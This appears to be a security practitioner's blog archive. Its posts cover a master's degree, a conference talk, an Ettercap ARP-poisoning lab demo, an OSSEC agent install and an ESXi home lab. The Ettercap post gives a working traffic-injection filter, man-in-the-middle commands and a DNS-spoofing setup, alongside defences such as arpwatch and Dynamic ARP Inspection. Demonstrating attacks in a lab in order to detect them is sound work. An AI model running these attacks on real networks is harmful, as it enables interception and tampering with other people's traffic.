22 January, 2019

What I learned when I earned a Master's

First, a disclaimer. I am employed by CMU but these views are mine. This is my perspective as a student, but it is impossible to ignore that I am also an employee.

In 2016, I finally decided to return to school for an MS after getting a BS in Information Systems Management on an Information Assurance track in 2007. In December 2018, I graduated with highest distinction. CMU has a good tuition benefits program, and one of my incentives when I accepted employment was the possibility of graduate school.

For various reasons, a distance curriculum was best for me, so I ended up taking the GRE and going to Heinz College for an MSIT: Information Security & Assurance.

This is the description from CMU's page, "Is MSIT Right For Me?"

The Master of Science in Information Technology (MSIT) is a part-time, distance learning program that is ideal for current IT professionals seeking to add business acumen, management, and targeted problem-solving skills to their portfolios. MSIT can also be a great fit for professionals from less technical areas, such as finance and health care, who wish to pivot toward technology-intensive roles and improve their analytical skills.
After completing the program, I would say the description above is fairly accurate and useful. In particular, this degree had a few things that appealed to me.
  1. It was at CMU, my employer, so tuition would be free with the caveat of counting as taxable income.
  2. It is geared towards working students.
  3. The degree offered some flexibility in focus and electives.
The last point allowed me to choose the Information Security & Assurance track and to balance classes between the business side and the technical side. Since I can take short technical classes as part of professional development at work, I decided it made sense to focus more on business, management, and leadership while concentrating my technical classes in areas where I wanted to improve or get more depth than I would through professional development classes.

Technical classes

There were a couple of areas involving technology or math where I knew the CMU classes would be challenging and cover material I wouldn't normally have time to learn through professional development. Some were full-semester classes and some were half-semester classes, called "minis" by Heinz College.

I focused on a few areas in my technical classes: areas where I thought I could use more formal teaching, areas directly related to my work, and subjects where justifying professional development would be difficult but the classes would still have some application in my career. The highlights that were most useful for me included the following.
  • An object-oriented programming class using Java.
  • An economic analysis class that started with more general economics then focused on the economics of IT, including implications for management and strategy.
  • A useful refresher on statistics covering descriptive statistics, statistical inference, and regression analysis, including applying statistical analysis to analyze IT problems. This also was a prerequisite for some other courses.
  • Exploring and visualizing data was very relevant to my current job and this class was focused primarily on exploring data sets using R. I had used R previously, but this class let me do a lot more and I enjoyed the final project.
  • Geographic information systems (GIS) was a very fun course, though I'm not sure I will use a lot of the skills directly. It did help me appreciate how much goes into geographic data analysis and information displays and teach me some lessons that apply to information presentation across disciplines.
  • Penetration testing was probably the class where my motivation for enrolling was closest to, "I want something that will be technical and fun." It was a fun class, but also very tough and frustrating at times when getting stuck on the challenge labs.


Business, leadership, and policy classes 

The other classes were in areas I thought would benefit me and my career because they were in areas where I might have had experience, but little formal education or knowledge. Examples include:
  • Privacy in the digital age was a great class that, per the syllabus, "combines technical, economic, legal, and policy perspectives to present a holistic view of its role and value in the digital age." It was a very useful class for anyone in information security given the privacy issues in today's world, many of which have a direct impact on how we do our jobs.
  • I learned a fair amount on strategy development for organizations and businesses, which included useful lessons and the history of creating organizational strategies. It used case studies really well to show the impact that an effective organizational strategy can bring.
  • Almost anyone will improve by taking a good writing class, so I was happy to take business writing for leaders even though I find writing courses somewhat stressful. I'm used to writing many papers, but writing for a writer, the professor in this case, can be intimidating.
  • Several courses covering information security management, governance, process, policies, and risk management. Most of these were required as part of the Information Security & Assurance focus.
This doesn't cover all of my classes, which I think ended up being about 16-18 classes total, mixing full semester classes and minis.

Do you need a degree or certification?

Why am I writing about this? Because there is an ongoing discussion throughout the field of information security ("cybersecurity") about the relevance of degrees, certifications, and other credentials. There are also related questions about how people should enter cybersecurity careers. My answer to any question about what someone needs will always be situational. Individual circumstances make a huge difference in any cost/benefit examination of a specific degree or certification. Context is the key to answering questions about career transitions, degrees, and certifications, because no one answer is correct for everyone.

In my case, the pro-degree arguments, benefits, or positive implications were:
  • I work for a university, so graduate degrees are encouraged and valued.
  • Employee benefits include free tuition at CMU.
  • The degree was available online, allowing a flexible school schedule.
  • The degree offered many classes that were useful towards improving myself as a professional.
  • I saw the potential to make myself more valuable as a mid- to late career professional.
  • I saw the potential to refresh skills I already have or learn new skills.
  • It provided a chance to take some longer-running technical classes that allowed more depth than typical professional development.
Some of the costs or drawbacks included:
  • It took a lot of time out of my life. The recommendation was to budget 12 hours per week per class, and that was fairly accurate. Some classes were a little less, some were much more.
  • Despite the free tuition, it still cost me money in books, time, and tax liability.
  • It was very stressful for me, particularly since I wasn't satisfied with simply passing but was trying to excel.
  • A small number of the classes covered fair chunks of material where I already have extensive experience, making them somewhat less interesting.
Given all this and more, I think it was the right decision for me. I started seeing the benefit of applying some of my learning at my work while still in school and I expect to continue leveraging some of the material going forward. It also made me examine my career and think more about where I want to go in the future. I could have pursued a more purely technical degree or even more on the business side instead of the mixed program, but I think I made the correct choice for my background and future goals.

What should you consider when trying to decide about a degree or certifications? I covered a lot of it in my benefits and costs, including time, cost, personal situation, professional situation, goals, and intangibles. I think certifications are generally a good way for earlier-career professionals to boost their credentials a bit, and I had a number of them when I first entered IT. Some jobs obviously require certifications, making the decision fairly simple. Some certifications are also more useful than others, so that can enter into the equation. The costs and benefits of a degree are generally both more significant, but the basic factors to consider are similar.

For underrepresented groups, degrees and certifications are often much more important because of disparities in opportunities. I earned MCSE, CCNP, and SANS certifications early in my career, but I was able to get into IT without a degree and before completing any of those certifications. Not everyone, even when capable, will get those opportunities.

I started in IT nearly 20 years ago, so my analysis entering the field today would also be different. I did three interviews and got three offers when I was looking for my first IT job, but degrees and certifications have become more typical requirements or wants in recent years. None of my old Microsoft and Cisco certifications are current today, and that likely has little impact on my credentials given my experience and degrees. It would likely be a different story if I were still early in my career or switching careers.

I will also point out that I don't see how having a degree or certification should ever count against someone unless it is literally a scam, like a diploma mill. Someone who earnestly earns a well-known and honest certification should not be looked down upon. The MCSE, CCNP, and SANS certifications all taught me a lot and forced me to teach myself in order to pass the exams.

What's next?

One thing we can probably all agree on is that cybersecurity requires constant learning and change to be successful. The IT environment today is drastically different than when I entered the field. While many of the baseline skills remain constant, the evolution of IT, for example from Windows NT to Active Directory to infrastructure in the cloud, means that we had better keep learning so we can adapt our skills to current environments and technologies. For me, the first step is always self-study, reading, and experimentation, but that is not the only way to develop skills and expertise.

Since I am done with school, I'll likely be pursuing professional development in technical areas to improve the depth of my skills. This will likely include a certification or two as a way to set a goal and timetable for learning specific topics. General topics like cloud security, cloud architecture, machine learning, security orchestration, edge computing, and mobile computing are all in flux and will require professionals to adapt as the technologies continue maturing. Everyone in cybersecurity needs methods to stay current in the face of changing technology.

05 March, 2015

Reflections on BSidesDC 2014 Talk: Meatspace Indicators and IR

This is long overdue, but I finally am posting a recap of my BSidesDC talk from October 2014. The talk was based on my previous blog post, A Practical Example of Non-technical Indicators and Incident Response. For my BSidesDC talk, I tweaked the title slightly to "Meatspace Indicators and Incident Response: A Story From the Lab of Nate Richmond."

Overall, I think the talk went well. To give people an idea of preparation, I did two dry runs of the talk. The first was for my coworkers, who then gave me valuable feedback on the content and suggestions for improvements. It also gave me a good idea whether the material filled the time I had for my talk. Whether or not you're giving a talk sponsored by your employer, it's a great idea to get feedback from peers before submitting or giving the talk.

Since the talk used my family as an example, I also did a dry run for them after modifying the content based on the feedback my coworkers gave to me. The main reason to give the talk to my family was to make sure they were all comfortable with what I said during the talk, but also to get some feedback and be fully transparent with them about what I do with our home network.

I felt slightly guilty about using material from a couple years ago for a conference, but in the end I decided it was still relevant. I think the material was very well-suited for BSides rather than a larger conference.

I embedded the video from YouTube below. After the video, I have some comments and critiques of my talk that I noted when watching the video. It can be very painful to watch and listen to yourself, particularly for those of us who are driven to be good at the things we do and thus are very critical of ourselves, but it's always important to review what you've done so you can do it better the next time. I definitely missed a few points that I had in my notes and also rushed a bit, finishing 10 minutes early. I probably should have done at least one more dry run.

I hope it was informative, useful, and entertaining for those that attended or watched later.

I'd very much like to thank BSidesDC for having me. I enjoyed the conference both as a speaker and an attendee. I highly recommend checking out your local BSides if you get the chance. I like their focus on community, collaboration, and keeping the cost for attendees to a minimum.

The "Introduction" slide was meant in part to set up a short musing on the stickers people put on the backs of their cars to represent their family. Sorry if you have these, but they really bug me for some reason.

I think I did emphasize my two main points: that security practitioners sometimes forget their goals in terms of supporting the business they're protecting, and that we can be overly focused on the latest technology when many indicators of compromise require no technology at all.

If I gave this talk again, I would add a slide after "Additional Context" to show a little more about my home lab architecture. It would have made sense to leverage a little material from my blog posts New Home Lab Configuration and Home Lab Part 2. I did have links to these posts in my presentation but forgot to point them out to my audience. I also had intended to point out the evolution of my lab from a stand-alone Sguil installation running on a 700MHz machine with 512MB of RAM, prior to the creation of Security Onion, to its current incarnation using virtual machines on a much faster machine.

Regarding Terms of Service and expectations of privacy, I firmly believe in what I stated during the presentation. Whether it's a business or personal network, it's very important to let your users know what is expected of them and also what is expected of those monitoring the network. It's also important for those doing network monitoring to properly adhere to these terms. When network monitoring and incident response is part of your job, you should not be taking advantage of your access to root around in people's personal business for fun. You should only be doing what is required to effectively do your job.

During the discussion of the changing landscape and countermeasures, I forgot to repeat the comments from the audience. This bothers me since I had explicitly reminded myself beforehand to repeat comments so everyone could hear them. If you are ever a presenter and the audience doesn't have microphones, please try to repeat any substantial questions or comments for the rest of the audience.

Finally, I had some other examples and discussion for the slide about "Why Does This Matter?" but neglected to glance at my notes. The bottom line is that we sometimes get caught up in the mentality of "nuke the entire site from orbit--it's the only way to be sure" rather than examining other possibilities that would still be effective but less disruptive to the business.

14 May, 2013

More Ettercap and ARP Poisoning

My previous post about Ettercap gets a lot of hits, so I thought I should post a deeper look at some of the features with examples of usage. Before continuing, I'll point out a couple other good resources since some of my work is just building on that of others.

Irongeek has a couple good pages dealing with Ettercap.

There is plenty more information there if you search his site, plus a number of other sites and forums where you can find information.

I decided to show a couple examples, then relate them to NSM and ways to detect ARP poisoning. I happen to be using FreeBSD as the attacking system in this case, and a Windows 7 system as the targeted system. For my experiment, I'll use the following image.

Here is the filter I used to replace the page title and body with my own title and body. It includes segments from Irongeek's filter, so I'll include the GPL notice.

#                                                                          #
#  nr.filter -- filter source file                                         #
#  Based on work by Irongeek and others http://www.irongeek.com/           #
#                                                                          #   
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
   if (search(DATA.data, "gzip")) {
      replace("gzip", "  ");
      msg("whited out gzip!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("<title>", "<title>PWNED<\/tITle><bodY><p><img src=\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg\"></p></boDY>");
   replace("<TITLE>", "<title>PWNED<\/tITle><bodY><p><img src=\"https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiY6fyoF3OxiszT7_hlfbDGYC8_xkIGRrx3REa6_qTYPRHTwVKJzs_IJ1VuY2xbURrYeT84ni6fPKvPhI0WzKqxF64kU2gmsHGnZ_DoJYd8D4QtS8oGExr17GegwF5sZ9cTxO2ubcDB02yW/s400/pwned+DH.jpg\"></p></boDY>");
   replace("</title>", " ");
   replace("</TITLE>", " ");
   replace("<body>", " ");
   replace("<BODY>", " ");
   msg("Filter Ran.\n");
}
This filter is designed to replace the "title" tag with a new title plus a body that links to the image. Then at the end of the filter, I attempt to replace the original page's title closing tag with a space since I already closed the tag, and then replace the original page's body tag with a space to eliminate the body of the page. I believe you could also use a pcre_regex command in the filter to more thoroughly remove the existing page body after inserting the image or other content of your choosing. See the etterfilter manual page for more.
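As an untested sketch of that pcre_regex idea (the function syntax follows the etterfilter manual page; I have not run this variant, and it only matches content contained in a single packet), the body removal could look like this:

```
# Sketch only -- not run against a live target; syntax per etterfilter(8).
if (ip.proto == TCP && tcp.src == 80) {
   if (pcre_regex(DATA.data, "<body>.*</body>")) {
      # keep the tags, drop everything between them in this packet
      pcre_regex(DATA.data, "(<body>).*(</body>)", "$1$2");
      msg("body stripped\n");
   }
}
```

Because the match happens per packet, a page body that spans multiple TCP segments would only be partially stripped, which is why the simpler fixed-string replaces above are still useful.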

To compile the filter, I simply execute the following:
$ etterfilter nr.filter -o nr.ef

Then to run ettercap on a FreeBSD VM in this example, I execute the following:
$ sudo ettercap -i em0 -F nr.ef -T -M arp:remote / /

The "-T" option is to use the text interface rather than the GUI or ncurses. The "-M" executes a man-in-the-middle with the arguments for ARP poisoning that includes the gateway, which is the first IP address in this case. The second IP address is a Windows system.

Here are some examples of the results if trying to surf using Chrome on the targeted Windows 7 system.

Notice the title is not changed on Slashdot, indicating they do not use a traditional HTML title tag. The body is also not replaced, just pushed down the page.
Here is what Google looks like.


Finally, here is my blog.

Success once again. Both the page title and body are replaced.
Another way to show how easy it is to redirect traffic to an unexpected site is with ettercap's DNS spoofing plugin. First, I edit /usr/local/share/ettercap/etter.dns and add the following lines.

facebook.com       A
*.facebook.com     A
www.facebook.com   PTR

google.com     A
*.google.com   A
www.google.com PTR

Then I run ettercap with the plugin enabled.
$ sudo ettercap -i em0 -P dns_spoof -T -M arp:remote / /

This 20 second video shows what happens when I then try to go to Google or Facebook from the targeted system.

This can be fairly amusing, particularly if you are on a lab network where shenanigans are not only acceptable but expected. On the other hand, imagine injecting something more malicious than a funny image, like a malicious iframe or JavaScript. I played around with injecting JavaScript into pages, and it really is trivial if you're in a position to poison the network gateway. A good old-fashioned Rickroll is another good way to demonstrate the attack non-maliciously.

As I mentioned in a previous post about Ettercap, the Metasploit site was briefly owned through ARP poisoning in 2008. It is an old-school attack that can still be quite effective if you have access to a system on the same network segment as a system you want to attack.

Defenses against ARP poisoning are fairly simple to describe but not necessarily practical or easy to implement. The first, mentioned in the Metasploit article, is using static ARP tables so ARP requests over the network are no longer necessary. This may be simple in the case of a single gateway entry, but the larger the network the more administrative overhead to use static ARP entries.
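To take a little of the sting out of that administrative overhead, static entries can be generated from an inventory file and reviewed before they are applied. This helper is my own sketch; the "IP MAC" file format, the helper name, and the addresses are illustrative assumptions, not part of any tool.

```shell
# gen_static_arp: emit "arp -s" commands from an inventory of "IP MAC"
# pairs on stdin, so the entries can be inspected before running as root.
gen_static_arp() {
  while read -r ip mac; do
      printf 'arp -s %s %s\n' "$ip" "$mac"
  done
}

# Review first, then apply:
# gen_static_arp < known-hosts.txt
# gen_static_arp < known-hosts.txt | sudo sh
```

Even with a generator, the entries still have to be maintained by hand whenever hardware changes, which is the real cost of the static approach.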

You can also use software to detect ARP poisoning, for example LBNL's arpwatch. Any software that can show you MAC addresses along with IP addresses can potentially be used to detect poisoning since you would see the same IP address in use by multiple MAC addresses. For example, here is what my ARP poisoning with ettercap looks like in Wireshark.

You can see that the poisoner, 00:0c:29:6d:92:78, is associated with both IP addresses.
So, it is easy to see in the traffic, but that doesn't mean it is easy to detect without some analyst intervention. Snort has an ARP spoofing preprocessor, but it seems likely that an IDS will often be in the wrong position on a network to see ARP traffic. In fact, most networks are probably not instrumented in such a way that ARP traffic is visible to an NSM sensor. It is not difficult in a technical sense, but it does require resources to deploy internal network sensors and architect the network so the sensors have visibility. There are probably more efficient ways to allocate detection resources in this case.
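As an illustrative sketch of the same idea arpwatch implements, a small shell function can flag an IP address whose claimed MAC changes. The helper name is my own, and the parsing assumes typical "tcpdump -l -n" ARP reply output; adjust for your platform.

```shell
# arp_watch: read "tcpdump -l -n arp" output on stdin and alert when an
# IP address is claimed by a new MAC, the classic ARP-poisoning symptom.
arp_watch() {
  awk '/is-at/ {
      for (i = 1; i <= NF; i++)
          if ($i == "is-at") { ip = $(i - 1); mac = $(i + 1) }
      sub(/,$/, "", mac)                 # strip tcpdump trailing comma
      if (ip in seen && seen[ip] != mac)
          printf "ALERT: %s moved from %s to %s\n", ip, seen[ip], mac
      seen[ip] = mac
  }'
}

# Live usage on the segment being watched (interface name will vary):
# sudo tcpdump -l -n -i eth0 arp | arp_watch
```

This is a toy compared to arpwatch, which also tracks timestamps and can mail alerts, but it shows how little is needed once you can actually see the ARP traffic.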

There are still other methods to help detect and prevent ARP spoofing, particularly with network equipment like managed switches. Jeremy Stretch has a good write-up on DHCP snooping and Dynamic ARP Inspection (DAI) over at his PacketLife blog showing exactly how DAI can be used to prevent and detect ARP poisoning. You can also read about DHCP snooping and DAI on Cisco's site. This seems like an easier method than IDS deployment since networking equipment is already positioned to see ARP traffic, but it does require equipment that supports ARP inspection.

I had originally thought of also showing how you could combine Ettercap with Metasploit to inject malicious traffic and more in the above examples, but I decided that would overly complicate this post. It is probably better reserved for a future post.

01 May, 2013

Installing OSSEC agent

With the recent news about the latest Apache backdoor on systems using cPanel, I thought it would be pertinent to show the process of adding an OSSEC agent that connects to a Security Onion server. Why is this relevant? Because OSSEC and other file integrity checkers can detect changes to binaries like Apache's httpd.

"OSSEC is an Open Source Host-based Intrusion Detection System that performs log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting and active response."
Many systems include integrity checking programs in their default installs these days, for instance Red Hat with AIDE. AIDE is also available in repositories for a number of other Linux distributions plus FreeBSD.

This case in particular would require using something other than the default options for integrity checking because cPanel installs Apache httpd in /usr/local/apache/bin, a non-standard directory that may not be automatically included when computing file hashes and doing subsequent integrity checks.

The reason I'm demonstrating OSSEC here is that it easily integrates with the Sguil console, and in Security Onion the sensors and server already have OSSEC configured to send alerts to Sguild. OSSEC also has additional functionality compared to AIDE. In this case, I'm installing the agent on a Slackware server.
$ wget http://www.ossec.net/files/ossec-hids-2.7.tar.gz
$ openssl sha1 ossec-hids-2.7.tar.gz
SHA1(ossec-hids-2.7.tar.gz)= 721aa7649d5c1e37007b95a89e685af41a39da43
$ tar xvzf ossec-hids-2.7.tar.gz
$ cd ossec-hids-2.7
$ sudo ./install.sh

  OSSEC HIDS v2.7 Installation Script - http://www.ossec.net

 You are about to start the installation process of the OSSEC HIDS.
 You must have a C compiler pre-installed in your system.
 If you have any questions or comments, please send an e-mail
 to dcid@ossec.net (or daniel.cid@gmail.com).

  - System: Linux webserver 3.8.4
  - User: root
  - Host: webserver
   -- Press ENTER to continue or Ctrl-C to abort. --

 1- What kind of installation do you want (server, agent, local, hybrid or help)? agent
  - Agent(client) installation chosen.

 2- Setting up the installation environment.

  - Choose where to install the OSSEC HIDS [/var/ossec]:
 3- Configuring the OSSEC HIDS.

   3.1- What's the IP Address or hostname of the OSSEC HIDS server?:
  - Adding Server IP

   3.2- Do you want to run the integrity check daemon? (y/n) [y]:

    - Running syscheck (integrity check daemon).

   3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
 - Running rootcheck (rootkit detection).

   3.4 - Do you want to enable active response? (y/n) [y]:

3.5- Setting the configuration to analyze the following logs:
    -- /var/log/messages
    -- /var/log/auth.log
    -- /var/log/syslog
    -- /var/adm/syslog
    -- /var/adm/auth.log
    -- /var/adm/messages
    -- /var/log/xferlog
    -- /var/log/proftpd.log
    -- /var/log/apache/error_log (apache log)
    -- /var/log/apache/access_log (apache log)
    -- /var/log/httpd/error_log (apache log)
    -- /var/log/httpd/access_log (apache log)

  - If you want to monitor any other file, just change
   the ossec.conf and add a new localfile entry.
   Any questions about the configuration can be answered
   by visiting us online at http://www.ossec.net .

   --- Press ENTER to continue ---


- Init script modified to start OSSEC HIDS during boot.
 - Configuration finished properly.
 - To start OSSEC HIDS:
                /var/ossec/bin/ossec-control start
 - To stop OSSEC HIDS:
                /var/ossec/bin/ossec-control stop
 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

    Thanks for using the OSSEC HIDS.
    If you have any question, suggestion or if you find any bug,
    contact us at contact@ossec.net or using our public maillist at

    ( http://www.ossec.net/main/support/ ).

    More information can be found at http://www.ossec.net

    ---  Press ENTER to finish (maybe more information below). ---

 - You first need to add this agent to the server so they 
   can communicate with each other. When you have done so,
   you can run the 'manage_agents' tool to import the 
   authentication key from the server.


   More information at: 

Next, I add the agent to my Security Onion server.
$ sudo /var/ossec/bin/manage_agents 

* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).

Choose your action: A,E,L,R or Q: A

- Adding a new agent (use '\q' to return to the main menu).

  Please provide the following:
   * A name for the new agent: webserver
   * The IP Address of the new agent:
   * An ID for the new agent[001]: 

Agent information:

   IP Address:

Confirm adding it?(y/n): y

* OSSEC HIDS v2.6 Agent manager.     *
* The following options are available: *

   (A)dd an agent (A).
   (E)xtract key for an agent (E).
   (L)ist already added agents (L).
   (R)emove an agent (R).

Choose your action: A,E,L,R or Q: e

Available agents: 

   ID: 001, Name: webserver, IP:

Provide the ID of the agent to extract the key (or '\q' to quit): 001

Agent key information for '001' is: 


** Press ENTER to return to the main menu.

Now copy the key, go back to the web server, paste and import the key.
$ sudo /var/ossec/bin/manage_agents 

* OSSEC HIDS v2.7 Agent manager.     *
* The following options are available: *

   (I)mport key from the server (I).

Choose your action: I or Q: i

* Provide the Key generated by the server.
* The best approach is to cut and paste it.
*** OBS: Do not include spaces or new lines.

Paste it here (or '\q' to quit): ---snip---

Agent information:
   IP Address:

Confirm adding it?(y/n): y

If I were running a system with cPanel that was vulnerable to Cdorked.A, I would want to make sure OSSEC is monitoring the directories containing the Apache httpd files. The OSSEC default configuration from my recent install is /var/ossec/etc/ossec.conf, and the relevant lines are below:
    <!-- Frequency that syscheck is executed - default to every 22 hours -->
    <!-- Directories to check  (perform all possible verifications) -->
    <directories check_all="yes">/etc,/usr/bin,/usr/sbin</directories>
    <directories check_all="yes">/bin,/sbin</directories>
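For the cPanel case, the fix would be one more directories element inside the syscheck section of ossec.conf. This is a sketch; the /usr/local/apache path comes from the cPanel layout mentioned earlier, and you should adjust it to your actual install:

```
    <directories check_all="yes">/usr/local/apache</directories>
```

A restart of the agent is needed for syscheck to pick up the new directory.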

So by default OSSEC would apparently not be checking the integrity of cPanel's Apache installation and I would need to add /usr/local/apache to the directory checks. After making any changes for my particular system, I check the status of OSSEC and it is not yet running.
$ sudo /etc/rc.d/rc.ossec status
ossec-logcollector not running...
ossec-syscheckd not running...
ossec-agentd not running...
ossec-execd not running...
$ sudo /etc/rc.d/rc.ossec start 
Starting OSSEC HIDS v2.7 (by Trend Micro Inc.)...
Started ossec-execd...
Started ossec-agentd...
Started ossec-logcollector...
Started ossec-syscheckd...

Note that after adding the OSSEC agent on the remote system and then adding it on the OSSEC server, you must restart ossec-hids-server in order for the ossec-remoted process to start listening on 1514/udp for remote agents.
$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted not running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...
$ sudo /etc/init.d/ossec-hids-server restart
Killing ossec-monitord .. 
Killing ossec-logcollector .. 
ossec-remoted not running ..
Killing ossec-syscheckd .. 
Killing ossec-analysisd .. 
ossec-maild not running ..
Killing ossec-execd .. 
OSSEC HIDS v2.6 Stopped
Starting OSSEC HIDS v2.6 (by Trend Micro Inc.)...
OSSEC analysisd: Testing rules failed. Configuration error. Exiting.
2013/04/30 23:13:59 ossec-maild: INFO: E-Mail notification disabled. Clean Exit.
Started ossec-maild...
Started ossec-execd...
Started ossec-analysisd...
Started ossec-logcollector...
Started ossec-remoted...
Started ossec-syscheckd...
Started ossec-monitord...

$ sudo /etc/init.d/ossec-hids-server status
ossec-monitord is running...
ossec-logcollector is running...
ossec-remoted is running...
ossec-syscheckd is running...
ossec-analysisd is running...
ossec-maild not running...
ossec-execd is running...

$ netstat -l | grep 1514
udp        0      0 *:1514                  *:*    

Note the error, which corresponds to the FAQ entry about getting an error when starting OSSEC. However, since I'm running OSSEC 2.7, that entry did not seem to apply. Poking around, I realized the ossec-logtest executable had not been copied to /var/ossec/bin when I ran the install script. After I manually copied it into that directory, restarting OSSEC no longer produced the "Testing rules failed" error.

Once you have installed OSSEC on the system to be monitored, added the agent on the server, imported the key on the monitored system, restarted the server process, and started the client process, you will start getting alerts from the newly added system in Sguil. For example, after updating gcc, the content of a Sguil alert will look like this:
Integrity checksum changed for: '/usr/bin/gcc'
Old md5sum was: '764a405824275d806ab5c441516b2d79'
New md5sum is : '6ab74628cd8a0cdf84bb3329333d936e'
Old sha1sum was: '230a4c09010f9527f2b3d6e25968d5c7c735eb4e'
New sha1sum is : 'b931ceb76570a9ac26f86c12168b109becee038b'
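
To verify an alert like this by hand, you can recompute the same checksums OSSEC compares. A quick sketch, using /bin/sh as a stand-in for the flagged file:

```shell
# Recompute the MD5 and SHA1 checksums that appear in OSSEC's
# integrity alerts; /bin/sh is a stand-in for the flagged file
md5sum /bin/sh
sha1sum /bin/sh
```

If the current output matches the "New" values from the alert and the change is explained (here, a legitimate gcc update), the alert can be cleared.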

In the Sguil console, if I wanted to view all the recent OSSEC alerts, I could perform a query as pictured below. Note that you need to escape the brackets or remove them in favor of the MySQL wildcards '%%'.

Finally, to show an example of the various types of alerting that OSSEC can do in addition to checksum changes, here is a query and output directly from the MySQL console.
mysql> SELECT count(signature),signature FROM event WHERE signature LIKE '%%OSSEC%%' GROUP BY signature ORDER BY count(signature) DESC;
+------------------+---------------------------------------------------------------------------------------+
| count(signature) | signature                                                                             |
+------------------+---------------------------------------------------------------------------------------+
|              388 | [OSSEC] Integrity checksum changed.                                                   |
|              149 | [OSSEC] Host-based anomaly detection event (rootcheck).                               |
|               46 | [OSSEC] Integrity checksum changed again (2nd time).                                  |
|               39 | [OSSEC] IP Address black-listed by anti-spam (blocked).                               |
|               12 | [OSSEC] Integrity checksum changed again (3rd time).                                  |
|                4 | [OSSEC] Web server 400 error code.                                                    |
|                3 | [OSSEC] Receipent address must contain FQDN (504: Command parameter not implemented). |
+------------------+---------------------------------------------------------------------------------------+
7 rows in set (0.00 sec)
The highest-count alert, plus the alerts indicating "2nd time" and "3rd time", represent the basic functionality needed to detect changes to a file, which was my original use case. The "rootcheck" alerts flag files owned by root but writable by everyone. The balance of the alerts come from reading the system logs and detecting the system rejecting emails (anti-spam, 504) or web server error codes.

Back to the original problem of Cdorked.A: the blog posts on the subject also indicate that NSM could detect the unusually long HTTP sessions, and there are no doubt other network behaviors that could be used to create signatures or network analytics resulting in detection. File integrity checks are just one possible way to detect a compromised server. Remember that you need known good checksums for this to work! Ideally, you install something like OSSEC before the system goes live on the network, or at the very least before it runs any listening services that could be compromised prior to computing the checksums.
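
That "known good" requirement can be illustrated with a minimal baseline-and-verify sketch, which is essentially what OSSEC's syscheck automates (the file choices below are arbitrary examples):

```shell
# Record known-good checksums while the system is still trusted
md5sum /bin/sh /bin/ls > baseline.md5

# Later, verify against the baseline; any changed file makes this fail
md5sum -c baseline.md5
```

If the baseline is computed after a compromise, the checksums simply ratify the attacker's files, which is why install order matters.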

22 April, 2013

Home Lab Part 2: VMware ESXi, Security Onion, and More

As I stated in my previous post about a new home lab configuration, I decided to try VMware ESXi 5.1 on my new Shuttle SH67H. ESXi is free for uses like this, presumably because it clearly benefits VMware when professionals can use it in a lab setting, encouraging use of their paid products in production. I have seen some conflicting accounts, but it appears that the main limit on the free version of ESXi 5.1 is 32GB of RAM.

I won't go into too much detail about the installation since it is adequately covered by a couple of other posts I found prior to purchasing my system.

I will mainly cover details that stood out and things I discovered as someone new to ESXi.

I had already planned to get a Shuttle for the small form factor, low noise, and low power usage. Finding out that the SH67H could be used as a white box for ESXi made it easy to pick an initial project once I built the system. (Okay, we could quibble over whether a Shuttle counts as a white box). Additionally, since my previous home network sensor running Sguil had died, I figured that the first VM to build would be Security Onion but that I'd still be able to run multiple other VMs without impacting my home lab NSM.

Getting ESXi installed on the Shuttle was pretty simple. After booting to CD, I just followed the prompts and made sane choices. The one thing to note is that I installed ESXi to an external USB flash drive. Since the OS is so small, it gets loaded primarily to RAM at boot anyway. Using a flash drive has advantages and disadvantages, as discussed at length on the VMware forums and elsewhere. For my home lab I decided to install to the flash drive, but chances are it will actually make no difference to me. Some ESXi servers have no local storage, so I imagine using a USB flash drive is particularly common on those systems.

After installing with a directly connected keyboard and monitor, I moved the system into my home "server closet" and booted it headless. I installed the vSphere Client on my local Windows VM since I don't have a non-VM Windows installation. The vSphere Client was surprisingly easy to use, and I might even go as far as to call it user-friendly. You can see in the screenshot below that it is relatively straightforward.
The error states "System logs on host vmshuttle are stored on non-persistent storage."
The first thing I noticed was that, because I installed ESXi to the flash drive, I got the error shown in my screenshot.

This error was only temporary. I am not sure exactly when it was resolved, most likely after a reboot or after I created the initial guest VM, but the system created a ".locker" directory in which I can clearly see all the logs. I am assuming they are persistent, since vmstore0 is the internal 1TB hard drive, not the USB flash drive.

# cd /vmfs/volumes/vmstore0/
# ls -l .locker/
drwxr-xr-x    1 root     root           280 Apr  7 16:01 core
drwxr-xr-x    1 root     root           280 Apr  7 16:01 downloads
drwxr-xr-x    1 root     root          4340 Apr 16 02:15 log
drwxr-xr-x    1 root     root           420 Apr  7 16:01 var

I believe another option for fixing the error would be to manually set the scratch partition as detailed in VMware's Knowledge Base, though I haven't actually tried that to date.

Before being able to SSH into the ESXi host and look at the above directories and files, I had to enable SSH. The configuration for SSH and a number of other security-related services is available in vSphere by highlighting the host (since in the workplace you may use vSphere to manage multiple ESXi systems), then going to the Configuration tab, then Security Profile, and finally SSH Properties. If you haven't noticed already, ESXi defaults to using root for everything. I haven't yet investigated the feasibility of locking down the ESXi host, but I think it's safe to say most people rely on keeping the host as isolated as possible, since the host OS is not particularly flexible or configurable outside the options VMware provides.

